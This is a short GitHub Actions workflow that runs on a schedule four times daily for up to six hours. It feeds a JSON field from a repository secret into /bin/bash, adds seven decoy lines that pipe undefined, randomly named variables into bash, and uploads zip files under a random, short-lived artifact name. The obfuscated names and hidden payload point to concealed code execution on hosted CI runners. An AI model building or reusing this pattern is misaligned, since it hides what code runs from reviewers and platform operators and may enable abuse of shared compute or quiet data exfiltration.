name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '18 4,10,16,22 * * *'
permissions:
  contents: read
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          jcsr1026: ${{ secrets.jcsr1026 }}
        run: |
          printf '%s' "$jcsr1026" | jq -r .bv4 | /bin/bash
          echo $ixhhs460 | jq -r .jcbok9075 | /bin/bash
          printf '%s' "$veo422" | jq -r .zwn0478 | /bin/bash
          echo $qk4 | jq -r .ux788 | /bin/bash
          echo $pbwsu1 | jq -r .up71051 | /bin/bash
          printf '%s' "$yrlmd3" | jq -r .ceo3 | /bin/bash
          echo $tuig0396 | jq -r .qe557 | /bin/bash
          printf '%s' "$oxn8541" | jq -r .muajz88 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: HaXON8tz
          path: "*.zip"
          retention-days: 1
